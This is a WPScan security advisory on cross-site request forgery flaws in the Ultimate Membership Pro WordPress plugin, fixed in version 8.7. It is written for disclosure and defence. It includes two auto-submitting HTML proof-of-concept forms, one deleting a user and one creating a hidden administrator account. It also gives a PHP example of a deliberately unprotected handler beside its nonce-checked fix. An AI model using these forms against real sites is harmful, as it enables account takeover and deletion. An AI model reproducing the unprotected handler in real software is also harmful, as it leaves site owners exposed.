WPScan

WordPress Plugin Vulnerabilities

Ultimate Membership Pro < 8.7 - Cross-Site Request Forgery allowing Arbitrary Account Deletion and Creation

Description

While confirming that the issues from https://wpvulndb.com/vulnerabilities/10086 had been remediated, two CSRF issues were identified that allow an attacker to make a logged-in administrator delete arbitrary accounts, as well as create a new administrator account. Other CSRF issues may be present but have not been checked.


February 17th, 2020 - Envato Notified
February 22nd, 2020 - New version released (8.7), fixing the reported issues and adding CSRF checks to all other actions, as recommended.

Proof of Concept

<!-- PoC 1: forged POST to the plugin's users tab, deleting the user with ID 5 -->
<html>
  <body onload="document.forms[0].submit();">
    <form action="https://example.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST">
      <input type="hidden" name="ihc_limit" value="25" />
      <input type="hidden" name="delete_users[]" value="5" />
      <input type="hidden" name="delete" value="Delete" />
    </form>
  </body>
</html>


<!-- PoC 2: forged POST to the same tab, creating a new administrator account -->
<html>
  <!-- Account will not show up in the plugin's users list (because of admin role), but will be in the WP users list -->
  <body onload="document.forms[0].submit();">
    <form action="https://example.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="user_login" value="admin-csrf" />
      <input type="hidden" name="user_email" value="[email protected]" />
      <input type="hidden" name="first_name" value="Admin" />
      <input type="hidden" name="last_name" value="CSRF" />
      <input type="hidden" name="pass1" value="Passw0rd" />
      <input type="hidden" name="pass2" value="Passw0rd" />
      <input type="hidden" name="role" value="administrator" />
      <input type="hidden" name="ihc_user_levels" value="-1" />
      <input type="hidden" name="ihc_overview_post" value="-1" />
      <input type="hidden" name="Submit" value="Register" />
    </form>
  </body>
</html>
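The fix class named in the timeline (CSRF checks on the plugin's actions) is the standard WordPress nonce pattern. The following is an added illustration, not the plugin's own code: a hypothetical handler for the "Delete" action of the users tab targeted by PoC 1, first in the unprotected form and then hardened with a nonce and a capability check. The function names and the nonce action name `ihc_example_delete_users` are assumptions; the same pattern applies to the account-creation form in PoC 2.

```php
<?php
// Added illustration (not the plugin's code). Hypothetical handler for the
// "Delete" action of the users tab: admin.php?page=ihc_manage&tab=users

// VULNERABLE pattern: the request is trusted because the admin is logged in.
// A cross-site form post carries the admin's session cookies, so a forged
// request like PoC 1 is processed exactly as if the admin had clicked Delete.
function ihc_example_delete_users_vulnerable() {
    if ( empty( $_POST['delete'] ) || empty( $_POST['delete_users'] ) ) {
        return;
    }
    require_once ABSPATH . 'wp-admin/includes/user.php'; // wp_delete_user()
    foreach ( (array) $_POST['delete_users'] as $user_id ) {
        wp_delete_user( (int) $user_id );
    }
}

// FIXED pattern: require a nonce bound to this action and the current user,
// plus the capability the action needs. 'ihc_example_delete_users' and
// '_ihc_nonce' are hypothetical names chosen for this illustration.
function ihc_example_delete_users_fixed() {
    if ( empty( $_POST['delete'] ) || empty( $_POST['delete_users'] ) ) {
        return;
    }
    // Stops with "The link you followed has expired" when the nonce is
    // missing, expired, or was issued for another action or another user.
    check_admin_referer( 'ihc_example_delete_users', '_ihc_nonce' );
    if ( ! current_user_can( 'delete_users' ) ) {
        wp_die( esc_html__( 'You are not allowed to delete users.' ) );
    }
    require_once ABSPATH . 'wp-admin/includes/user.php'; // wp_delete_user()
    foreach ( array_map( 'absint', (array) $_POST['delete_users'] ) as $user_id ) {
        if ( $user_id && $user_id !== get_current_user_id() ) {
            wp_delete_user( $user_id );
        }
    }
}

// The legitimate form embeds the nonce field; a form hosted on another origin
// cannot read the admin's page, so it cannot obtain a valid nonce to include.
function ihc_example_render_delete_form( $users ) {
    $action = admin_url( 'admin.php?page=ihc_manage&tab=users' );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    wp_nonce_field( 'ihc_example_delete_users', '_ihc_nonce' );
    foreach ( $users as $user ) {
        printf( '<label><input type="checkbox" name="delete_users[]" value="%d" /> %s</label>',
            (int) $user->ID, esc_html( $user->user_login ) );
    }
    echo '<input type="submit" name="delete" value="Delete" /></form>';
}
```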

Affects Plugins

indeed-membership-pro
Fixed in version 8.7

References

https://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
https://blog.wpscan.com/wpvulndb/report/2020/03/06/ultimate-membership-pro-recent-vulnerabilities-breakdown.html

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

ErwanLR

Submitter website
https://wpscan.org
Submitter twitter
erwan_lr
Verified

Yes

WPVDB ID
136f270c-4601-4484-a57b-c824956c8ef0

Timeline

Publicly Published

2020-02-24

Added

2020-02-24

Last Updated

2020-03-07
